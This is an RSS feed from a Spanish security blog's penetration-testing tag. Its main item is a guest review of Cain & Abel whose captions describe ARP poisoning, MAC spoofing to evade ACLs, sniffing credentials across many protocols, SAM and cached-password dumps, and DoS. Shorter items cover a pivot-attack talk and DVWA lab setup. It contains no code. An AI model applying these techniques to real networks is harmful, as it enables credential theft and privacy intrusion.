<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Sec-Track &#187; Penetration Test</title>
	<atom:link href="http://www.sec-track.com/tag/penetration-test/feed" rel="self" type="application/rss+xml" />
	<link>http://www.sec-track.com</link>
	<description></description>
	<lastBuildDate>Wed, 01 Feb 2012 15:08:22 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>“Como CAIN&amp;ABEL No hay otro igual”</title>
		<link>http://www.sec-track.com/%e2%80%9ccomo-cainabel-no-hay-otro-igual%e2%80%9d</link>
		<comments>http://www.sec-track.com/%e2%80%9ccomo-cainabel-no-hay-otro-igual%e2%80%9d#comments</comments>
		<pubDate>Tue, 22 Feb 2011 20:50:10 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Cain & Abel]]></category>
		<category><![CDATA[Hacking Tools]]></category>
		<category><![CDATA[Penetration Test]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=898</guid>
		<description><![CDATA[Saludos a todos, Sí, esa es la razón de ser de este escrito,  “Como CAIN&#38; ABEL no hay otro igual” y no estoy haciendo referencia a “Holy Bible” y la Narración del chicho Bueno y el chico Malo con su sacrificio ante Dios. Como leerán y verán a continuación Cain es un chico tan bueno [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Saludos a todos,</p>
<p style="text-align: justify;">Sí, esa es la razón de ser de este escrito,  “Como CAIN&amp; ABEL no hay otro igual” y no estoy haciendo referencia a “<em>Holy Bible</em>” y la Narración del chicho Bueno y el chico Malo con su sacrificio ante Dios.</p>
<p style="text-align: justify;">Como leerán y verán a continuación Cain es un chico tan bueno como Abel.</p>
<p style="text-align: justify;">En realidad estoy haciendo referencia al excelente software creado por el Señor Massimiliano Montoro y su grandioso <a href="http://www.oxid.it/cain.html" target="_blank"><strong>Web Site</strong></a> .</p>
<p style="text-align: justify;">Rondaba en mi cabeza la intención de escribir desde hace mucho rato sobre este maravilloso aplicativo, puesto que se convirtió en uno más de las armas de mi arsenal para Análisis de Seguridad, el cual no puede faltar en ningún de mis Test de Intrusión Interno, apelando a sus excelentes métodos para la recuperación y desciframiento de contraseñas, contribuyendo así  en la consecución de hallazgos que nos fortalezcan nuestras evidencias de auditoría de seguridad.</p>
<p style="text-align: justify;">Antes de pasar a las imágenes de evidencia, una breve descripción de lo que es CAIN&amp;ABEL  para quien no conozca de esta maravillosa herramienta Multiuso.</p>
<p style="text-align: justify;">“Caín y Abel es una herramienta de recuperación de contraseña para sistemas operativos de Microsoft.  Permite la recuperación fácil de diversos tipo de contraseñas por métodos de sinfín de la red (olfateo de red), craqueo contraseñas cifradas utilizando ataques de  diccionario, fuerza bruta y ataques de criptoanálisis, permite grabar conversaciones de VoIP, descodificar contraseñas, recuperar claves de la red inalámbrica, revelar  contraseñas en Text Box, caché las contraseñas en Windows y el análisis de protocolos de enrutamiento.</p>
<p style="text-align: justify;">La última versión es más rápida y contiene muchas características nuevas como APR (Arp Poison Routing) que permite el rastreo en cambió de LANs y ataques Man-in-the-Middle.</p>
<p style="text-align: justify;">El sniffer en esta versión también puede analizar los protocolos cifrados como SSH-1 y HTTPS y contiene los filtros para capturar las credenciales de una amplia gama de mecanismos de autenticación. “</p>
<p style="text-align: justify;">Bien y si no me crees, échale un vistazo a las siguientes evidencias. El orden de los factores no altera el producto  xDDD</p>
<p style="text-align: justify;">No pretendo entregar un manual del producto, el cual puedes descargar de aquí <a href="http://www.oxid.it/ca_um">View Cain &amp; Abel on-line User Manual</a> Así que iré detallando cada evidencia sin establecer un nivel o criterio de importancia.</p>
<p style="text-align: justify;">Corresponden a diversos proyectos ejecutados de los cuales tratare de incluir lo que considere más relevante, ya que si me doy a la tarea de subir todo, creo que este Artículo no me alcanzaría para su inclusión.</p>
<p style="text-align: justify;"><strong>Enumeración de Equipos o Sondeo de Red.</strong></p>
<p style="text-align: justify;">Si hacemos uso de Su pestaña de Host y Network tenemos la posibilidad de Sondear o enumerar la Red de la cual pertenecemos al segmento de Red o tenemos enrutamiento alguno.  De igual forma tratar de acceder a recursos compartidos, Bases de Datos, o registros de Windows en los equipos.</p>
<p style="text-align: center;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/11.jpg"><img class="aligncenter size-full wp-image-901" title="1" src="http://www.sec-track.com/wp-content/uploads/2011/02/11.jpg" alt="" width="550" height="498" /></a></p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/2.jpg"><img class="aligncenter size-full wp-image-903" title="2" src="http://www.sec-track.com/wp-content/uploads/2011/02/2.jpg" alt="" width="547" height="496" /></a></p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/3.jpg"><img class="aligncenter size-full wp-image-904" title="3" src="http://www.sec-track.com/wp-content/uploads/2011/02/3.jpg" alt="" width="534" height="490" /></a></p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/4.jpg"><img class="aligncenter size-full wp-image-905" title="4" src="http://www.sec-track.com/wp-content/uploads/2011/02/4.jpg" alt="" width="560" height="458" /></a></p>
<p>Recursos Compartidos, acceso por clave o usuario Anonymous</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/5.jpg"><img class="aligncenter size-full wp-image-906" title="5" src="http://www.sec-track.com/wp-content/uploads/2011/02/5.jpg" alt="" width="560" height="496" /></a></p>
<p>Llaves de Registro y Recursos Compartidos.</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/6.jpg"><img class="aligncenter size-full wp-image-907" title="6" src="http://www.sec-track.com/wp-content/uploads/2011/02/6.jpg" alt="" width="560" height="510" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/7.jpg"><img class="aligncenter size-full wp-image-908" title="7" src="http://www.sec-track.com/wp-content/uploads/2011/02/7.jpg" alt="" width="533" height="538" /></a></p>
<p>Enumeración de usuarios, registro y recursos compartidos</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/8.jpg"><img class="aligncenter size-full wp-image-909" title="8" src="http://www.sec-track.com/wp-content/uploads/2011/02/8.jpg" alt="" width="570" height="378" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/9.jpg"><img class="aligncenter size-full wp-image-910" title="9" src="http://www.sec-track.com/wp-content/uploads/2011/02/9.jpg" alt="" width="560" height="505" /></a></p>
<p>Enumeración de Servicios.</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/10.jpg"><img class="aligncenter size-full wp-image-911" title="10" src="http://www.sec-track.com/wp-content/uploads/2011/02/10.jpg" alt="" width="570" height="515" /></a></p>
<p>Registro del sistema</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/111.jpg"><img class="aligncenter size-full wp-image-912" title="11" src="http://www.sec-track.com/wp-content/uploads/2011/02/111.jpg" alt="" width="454" height="547" /></a></p>
<p style="text-align: justify;">En algunas ocasiones nuestra estación de trabajo es controlada o nos aplican restricciones con medidas como Vlans o Acls (Listas de Control de Accesos), etc.  Algunas formas de tratar de evadirlas es montando una Maquina virtual y estableciendo una configuración estática o dinámica, un Ip spoofing,  mac spoofing,  con una mac diferente para saltar el control de Acls por MAC, como se muestra a continuación capturando credenciales de autenticación (login y password) en  tramas de HTTP una vez se ha iniciado un ARP Poisoning.</p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/12.jpg"><img class="aligncenter size-full wp-image-913" title="12" src="http://www.sec-track.com/wp-content/uploads/2011/02/12.jpg" alt="" width="560" height="316" /></a></p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/13.jpg"><img class="aligncenter size-full wp-image-914" title="13" src="http://www.sec-track.com/wp-content/uploads/2011/02/13.jpg" alt="" width="560" height="342" /></a></p>
<p style="text-align: justify;">Captura de tramas HTTP con credenciales y comportamientos de navegación, si tienes algún sitio prohibido de navegación, aquí te darás cuenta que te están saltando el proxy o el Web Content.</p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/14.jpg"><img class="aligncenter size-full wp-image-915" title="14" src="http://www.sec-track.com/wp-content/uploads/2011/02/14.jpg" alt="" width="560" height="312" /></a></p>
<p>Captura de credenciales de autenticación servicio FTP, en conexiones FTP</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/15.jpg"><img class="aligncenter size-full wp-image-916" title="15" src="http://www.sec-track.com/wp-content/uploads/2011/02/15.jpg" alt="" width="386" height="442" /></a></p>
<p>Explotando el servicio  ;P</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/16.jpg"><img class="aligncenter size-full wp-image-917" title="16" src="http://www.sec-track.com/wp-content/uploads/2011/02/16.jpg" alt="" width="490" height="479" /></a></p>
<p>O lo prefieres visualizar así  <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/17.jpg"><img class="aligncenter size-full wp-image-918" title="17" src="http://www.sec-track.com/wp-content/uploads/2011/02/17.jpg" alt="" width="488" height="545" /></a></p>
<p>Captura de tramas del protocolo <em>SIP</em> (Session Initiation <em>Protocol</em>) en un sistema Asterisk (VoiP).</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/18.jpg"><img class="aligncenter size-full wp-image-919" title="18" src="http://www.sec-track.com/wp-content/uploads/2011/02/18.jpg" alt="" width="560" height="266" /></a></p>
<p>Captura de tramas protocolo POP3 (servicio de correo interno)</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/19.jpg"><img class="aligncenter size-full wp-image-921" title="19" src="http://www.sec-track.com/wp-content/uploads/2011/02/19.jpg" alt="" width="560" height="290" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/20.jpg"><img class="aligncenter size-full wp-image-922" title="20" src="http://www.sec-track.com/wp-content/uploads/2011/02/20.jpg" alt="" width="449" height="377" /></a></p>
<p>Captura de tramas protocolo SMB. Indicio excelente para aplicar un SMB Relay  <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/21.jpg"><img class="aligncenter size-full wp-image-923" title="21" src="http://www.sec-track.com/wp-content/uploads/2011/02/21.jpg" alt="" width="560" height="280" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/22.jpg"><img class="aligncenter size-full wp-image-924" title="22" src="http://www.sec-track.com/wp-content/uploads/2011/02/22.jpg" alt="" width="560" height="301" /></a></p>
<p>Captura credenciales Oracle (TNS) ciframiento tipo DES !!</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/23.jpg"><img class="aligncenter size-full wp-image-925" title="23" src="http://www.sec-track.com/wp-content/uploads/2011/02/23.jpg" alt="" width="560" height="348" /></a></p>
<p>Captura  tramas de VoIP</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/24.jpg"><img class="aligncenter size-full wp-image-927" title="24" src="http://www.sec-track.com/wp-content/uploads/2011/02/24.jpg" alt="" width="560" height="170" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/25.jpg"><img class="aligncenter size-full wp-image-928" title="25" src="http://www.sec-track.com/wp-content/uploads/2011/02/25.jpg" alt="" width="560" height="252" /></a></p>
<p>Volcado de la SAM en una estación de trabajo vulnerada por su baja seguridad a nivel de LOCALHOST.</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/26.jpg"><img class="aligncenter size-full wp-image-929" title="26" src="http://www.sec-track.com/wp-content/uploads/2011/02/26.jpg" alt="" width="560" height="336" /></a></p>
<p>Proceso de ARP poisong y MITM (Man In The Middle) con Cain</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/27.jpg"><img class="aligncenter size-full wp-image-930" title="27" src="http://www.sec-track.com/wp-content/uploads/2011/02/27.jpg" alt="" width="560" height="357" /></a></p>
<p>Captura de tramas http de archivos, aplicativos que pueden ser modificados On line.</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/28.jpg"><img class="aligncenter size-full wp-image-931" title="28" src="http://www.sec-track.com/wp-content/uploads/2011/02/28.jpg" alt="" width="560" height="317" /></a></p>
<p style="text-align: justify;">Credenciales de autenticación conexión es Wirelles tomadas de los Cache Passwords de un equipo vulnerado a nivel de Localhost,  en donde se ha instalado Cain&amp;Abel.</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/29.jpg"><img class="aligncenter size-full wp-image-932" title="29" src="http://www.sec-track.com/wp-content/uploads/2011/02/29.jpg" alt="" width="560" height="290" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/30.jpg"><img class="aligncenter size-full wp-image-933" title="30" src="http://www.sec-track.com/wp-content/uploads/2011/02/30.jpg" alt="" width="560" height="235" /></a></p>
<p style="text-align: justify;">Creo que no te gustaría que te encontraran visitando sitios de tu preferencia xDD.</p>
<p style="text-align: justify;">Aclaro que no tengo nada contra la definición de Género o estilos de Vida. Pero con esta sociedad de doble moral, no creo que te guste que encuentren que visitas estos sitios. El problema es que este es un equipo corporativo de trabajo.</p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/31.jpg"><img class="aligncenter size-full wp-image-934" title="31" src="http://www.sec-track.com/wp-content/uploads/2011/02/31.jpg" alt="" width="560" height="253" /></a></p>
<p>Información de los Windows Mail Passwords del Cached Passwords del equipo.</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/32.jpg"><img class="aligncenter size-full wp-image-935" title="32" src="http://www.sec-track.com/wp-content/uploads/2011/02/32.jpg" alt="" width="560" height="222" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/33.jpg"><img class="aligncenter size-full wp-image-936" title="33" src="http://www.sec-track.com/wp-content/uploads/2011/02/33.jpg" alt="" width="560" height="343" /></a></p>
<p>Información de los Credential Manager del Cached Passwords del equipo.</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/34.jpg"><img class="aligncenter size-full wp-image-937" title="34" src="http://www.sec-track.com/wp-content/uploads/2011/02/34.jpg" alt="" width="560" height="157" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/35.jpg"><img class="aligncenter size-full wp-image-938" title="35" src="http://www.sec-track.com/wp-content/uploads/2011/02/35.jpg" alt="" width="560" height="264" /></a></p>
<p>Información del Protected Storage del Cached Passwords del equipo.</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/36.jpg"><img class="aligncenter size-full wp-image-939" title="36" src="http://www.sec-track.com/wp-content/uploads/2011/02/36.jpg" alt="" width="560" height="221" /></a></p>
<p>Información del Dialup Password del Cached Passwords del equipo</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/37.jpg"><img class="aligncenter size-full wp-image-940" title="37" src="http://www.sec-track.com/wp-content/uploads/2011/02/37.jpg" alt="" width="544" height="475" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/38.jpg"><img class="aligncenter size-full wp-image-941" title="38" src="http://www.sec-track.com/wp-content/uploads/2011/02/38.jpg" alt="" width="560" height="300" /></a></p>
<p style="text-align: justify;">Captura de Credential Manager en Cached Passwords, credencial de controlador de Dominio Maestro.</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/39.jpg"><img class="aligncenter size-full wp-image-942" title="39" src="http://www.sec-track.com/wp-content/uploads/2011/02/39.jpg" alt="" width="560" height="239" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/40.jpg"><img class="aligncenter size-full wp-image-943" title="40" src="http://www.sec-track.com/wp-content/uploads/2011/02/40.jpg" alt="" width="560" height="291" /></a></p>
<p>Captura de Certificados</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/41.jpg"><img class="aligncenter size-full wp-image-944" title="41" src="http://www.sec-track.com/wp-content/uploads/2011/02/41.jpg" alt="" width="533" height="383" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/42.jpg"><img class="aligncenter size-full wp-image-945" title="42" src="http://www.sec-track.com/wp-content/uploads/2011/02/42.jpg" alt="" width="560" height="456" /></a></p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/43.jpg"><img class="aligncenter size-full wp-image-946" title="43" src="http://www.sec-track.com/wp-content/uploads/2011/02/43.jpg" alt="" width="575" height="533" /></a></p>
<p style="text-align: justify;">Función Cracker de Cain&amp;Abel en donde puedes utilizar varios métodos para descifrar los hash de las contraseñas por medio de ataques por diccionario, fuera bruta, intentos, etc. Adicionalmente puedes subir diccionarios personalizados o las tablas de Rainbow Tables.</p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/44.jpg"><img class="aligncenter size-full wp-image-947" title="44" src="http://www.sec-track.com/wp-content/uploads/2011/02/44.jpg" alt="" width="560" height="326" /></a></p>
<p style="text-align: justify;">Capturas de sesión de Telnet</p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/45.jpg"><img class="aligncenter size-full wp-image-948" title="45" src="http://www.sec-track.com/wp-content/uploads/2011/02/45.jpg" alt="" width="560" height="376" /></a></p>
<p style="text-align: justify;">Descifrado de Hash de VNC levantadas del registro de Windows</p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/46.jpg"><img class="aligncenter size-full wp-image-949" title="46" src="http://www.sec-track.com/wp-content/uploads/2011/02/46.jpg" alt="" width="560" height="264" /></a></p>
<p style="text-align: justify;">Esto es una belleza como un Santo Grial, un LDAP abierto de Patitas  <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />      Esperando ser coronado</p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/47.jpg"><img class="aligncenter size-full wp-image-950" title="47" src="http://www.sec-track.com/wp-content/uploads/2011/02/47.jpg" alt="" width="560" height="295" /></a></p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/48.jpg"><img class="aligncenter size-full wp-image-951" title="48" src="http://www.sec-track.com/wp-content/uploads/2011/02/48.jpg" alt="" width="560" height="363" /></a></p>
<p style="text-align: justify;"><a href="http://www.sec-track.com/wp-content/uploads/2011/02/49.jpg"><img class="aligncenter size-full wp-image-952" title="49" src="http://www.sec-track.com/wp-content/uploads/2011/02/49.jpg" alt="" width="560" height="358" /></a></p>
<p>Capturas de tramas protocolo  SMNP</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/50.jpg"><img class="aligncenter size-full wp-image-953" title="50" src="http://www.sec-track.com/wp-content/uploads/2011/02/50.jpg" alt="" width="560" height="421" /></a></p>
<p>O si tu intención es una Denegación de Servicios (DoS)</p>
<p><a href="http://www.sec-track.com/wp-content/uploads/2011/02/51.jpg"><img class="aligncenter size-full wp-image-954" title="51" src="http://www.sec-track.com/wp-content/uploads/2011/02/51.jpg" alt="" width="505" height="380" /></a></p>
<p>Huyyyyy   <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </p>
<p style="text-align: justify;">La verdad dejemos hasta aquí porque me canse y se me atrasaron algunas vainas de trabajo y académicas……..</p>
<p style="text-align: justify;">He probado algunas otras opciones como el Cracking de Wirelles, Accesos por RDP, desciframiento de BD, Conexión a BD, Desciframiento de CCDU, Traceroute, RSA Token Security ID, Siskey Decoder, DecoderBase64, Cisco VPN Password y Cisco Decode Password. Algunas me han funcionado otras no!!.  A lo mejor por falta de conocimiento o ser mas diestro con la herramienta. Creo que no conozco más del 50% de la misma pero ya puedes medir su potencial con los hallazgos de las evidencias anteriores.</p>
<p style="text-align: justify;">Como puedes ver Cain también es un chico bueno como Abel!!!  <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<p style="text-align: justify;">Y como su título lo dice no he encontrado herramienta alguna similar para Linux, razón por la cual mantengo mi partición dual Win/BT algunas vainas sobre Windows como algunas herramientas forenses  y de seguridad.</p>
<p style="text-align: justify;">Ahora, no vamos a volver con el mismo cuento que siempre me tomo que usa Dsniff, Ettercap, Wireshark  que combínalo con scripts o con otras herramientas. Ni de esta forma alcanza el gran potencial de esta maravillosa herramienta. Eso si recomiendo,  si encuentras algo similar por favor no dudes en contactarme que es de mi especial interés!!</p>
<p style="text-align: justify;">Con gratitud  se escribió este artículo especialmente para el proyecto <a href="http://www.sec-track.com/" target="_blank"><strong>Sec-Track</strong></a> por permitirme participar de él. Congratulations mi gran amigo 4v4t4r por tan excelente iniciativa de seguridad.</p>
<p style="text-align: justify;">Espero que sean de su agrado estas líneas, que como cosa rara me extendí más de lo que esperaba, aunque como lo dije desde el principio tratare de ser breve, tratando de mostrar el potencial de la herramienta.</p>
<p style="text-align: justify;">No me queda más que despedirme, agradecerles a todos por invertir su tiempo en leer un poco estas líneas de conocimiento.</p>
<p style="text-align: justify;">Bytes</p>
<p style="text-align: justify;"><a href="http://world-of-dino.blogspot.com/" target="_blank"><strong>Dino</strong></a></p>
<p style="text-align: justify;"><strong>PD: </strong>Agradecimientos al Señor Massimiliano Montoro y su grandioso <a href="http://www.oxid.it/cain.html" target="_blank"><strong>Web Site</strong></a></p>
<p><strong>PD2:</strong> Se publica también en mi <a href="http://world-of-dino.blogspot.com/" target="_blank"><strong>Blog</strong></a></p>
<p>&#8212;&#8212;&#8212;&#8211;</p>
<p>Nota de 4v4t4r:</p>
<p><a href="http://twitter.com/d7n0" target="_blank"><strong>@d7n0</strong></a></p>
<ul>
<li>Administrador de Empresas</li>
<li>Gerencia en Consultoría Empresarial</li>
<li>Profesional en Sistemas de Información</li>
<li>Especialización Administración de la Información</li>
<li>Veinte (20) años de experiencia en Sistemas e Informática</li>
<li>Diez (10) años de experiencia en Seguridad Informática</li>
<li>Miembro activo de La Comunidad DragonJAR.</li>
<li>Miembro activo de la Comunidad Team SecurityIT</li>
<li>Coordinador del grupo SWAT de Hacking Etico</li>
<li style="text-align: justify;">Columnista de diversos articulos de seguridad Informatica, Hardening, Análisis Forense, Hacking Etico en revistas Electrónicas, como Hackerss.com, Dragonjar.org.</li>
<li>Analista en Seguridad Informática (Freelance)</li>
<li>Investigador Informática Forense (Freelance)</li>
<li style="text-align: justify;">Vinculación con la Empresa P@ssword S.A. Desde hace tres años desarrollando proyectos de Seguridad Informática (Aseguramiento, Análisis de Seguridad, Análisis Forense) a Organizaciones Gubernamentales, Estatales, Sector Público y Privado.</li>
<li>Asesor y Consultor de TICS</li>
<li style="text-align: justify;">Capacitador Diplomados de Seguridad Informatica en Universidades (Universidad Cooperativa, Universidad Libre de Colombia, Universidad Antonio Nariño, Universidad del Pacifico)</li>
<li>Capacitador cursos de Ethical Hacking en Centros de Entrenamiento de Alta Tecnologia CETEC, Itech Learning</li>
<li style="text-align: justify;">Ponente Nacional en temas de Seguridad Informática en diversos eventos, seminarios y Universidades (Universidad Javeriana, Universidad Santiago de Cali, Universidad Libre, Universidad Autonoma de Popayan, UNAD de Neiva).</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/%e2%80%9ccomo-cainabel-no-hay-otro-igual%e2%80%9d/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Real World Penetration Testing</title>
		<link>http://www.sec-track.com/real-world-penetration-testing</link>
		<comments>http://www.sec-track.com/real-world-penetration-testing#comments</comments>
		<pubDate>Thu, 21 Oct 2010 19:54:59 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Videos]]></category>
		<category><![CDATA[client side attacks]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[password cracking]]></category>
		<category><![CDATA[Penetration Test]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=789</guid>
		<description><![CDATA[Daniel Compton, Information Security Consultant of 7Safe, took the audience through a demonstration of common risks found that he sees whilst carrying out penetration tests for clients. This covered two main areas which were &#8220;client side attacks&#8221; and &#8220;pivot attacks&#8221;. The demonstrations were all based on fully patched Windows operating systems with anti-virus protection, firewall [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://twitter.com/#!/commonexploits" target="_blank"><strong>Daniel Compton</strong></a>, Information Security Consultant of <a href="http://7safe.com/index.html" target="_blank"><strong>7Safe</strong></a>, took the audience through a demonstration of common risks found that he sees whilst carrying out penetration tests for clients. This covered two main areas which were &#8220;client side attacks&#8221; and &#8220;pivot attacks&#8221;. The demonstrations were all based on fully patched Windows operating systems with anti-virus protection, firewall protection and the latest patches for 3rd party products. Once the client victim computer was exploited from the Internet, Daniel demonstrated how it was possible to pivot and dive deep into the internal corporate network and extracting passwords and credit card data. You can watch the video demonstration <a href="http://www.commonexploits.com/?p=172" target="_blank"><strong>here</strong></a>.</p>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/IdYUJUoRNIA?fs=1&amp;hl=en_US" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/v/IdYUJUoRNIA?fs=1&amp;hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/real-world-penetration-testing/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Implementación de Damn Vulnerable Web Application con VMWare, Qemu y VirtualBox</title>
		<link>http://www.sec-track.com/implementacion-de-damn-vulnerable-web-application-con-vmware-qemu-y-virtualbox</link>
		<comments>http://www.sec-track.com/implementacion-de-damn-vulnerable-web-application-con-vmware-qemu-y-virtualbox#comments</comments>
		<pubDate>Wed, 15 Sep 2010 22:23:43 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[DVWA]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[Qemu]]></category>
		<category><![CDATA[VirtualBox]]></category>
		<category><![CDATA[Virtualización]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=770</guid>
		<description><![CDATA[Este post muestra los procedimientos necesarios para implementar el entorno de entrenamiento DVWA (Damn Vulnerable Web Application) sobre diferentes soluciones de virtualización (VMWare, Qemu y VirtualBox). Veamos primero, los pasos para llevarlo a cabo en VMWare WorkStation. Menu &#8211; File &#8211; New Virtual Machine Continuamos el paso a paso del wizard de creación de máquinas [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Este post muestra los procedimientos necesarios para implementar el entorno de entrenamiento <a href="http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web" target="_blank"><strong>DVWA (Damn Vulnerable Web Application)</strong></a> sobre diferentes soluciones de virtualización (VMWare, Qemu y VirtualBox). Veamos primero, los pasos para llevarlo a cabo en VMWare WorkStation.</p>
<p style="text-align: justify;">Menu &#8211; File &#8211; New Virtual Machine</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img715.imageshack.us/img715/2413/24191063.jpg" alt="" width="471" height="274" /></p>
<p style="text-align: justify;">Continuamos el paso a paso del wizard de creación de máquinas virtuales ilustado en las siguientes imágenes.</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img822.imageshack.us/img822/2739/88160904.jpg" alt="" width="432" height="392" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img412.imageshack.us/img412/3743/91999314.jpg" alt="" width="356" height="389" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img841.imageshack.us/img841/7286/91391738.jpg" alt="" width="436" height="389" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img718.imageshack.us/img718/4517/46218187.jpg" alt="" width="436" height="390" /></p>
<p style="text-align: justify;">Finalmente ejecutamos la nueva máquina creada, desde allí podemos seleccionar el sistema de inicio o instalación (si preferimos hacerlo):</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img834.imageshack.us/img834/2614/13383203.jpg" alt="" width="503" height="315" /></p>
<p style="text-align: justify;">Automaticamente inicia <a href="http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web" target="_blank"><strong>DVWA</strong></a></p>
<p style="text-align: justify;"><img class="aligncenter" title="DVWA" src="http://img651.imageshack.us/img651/3874/27111926.jpg" alt="" width="550" height="149" /></p>
<p style="text-align: justify;">Si verificamos nuestra configuración de red, podremos identificar la dirección IP en la cual ya se encuentra disponible el entorno.</p>
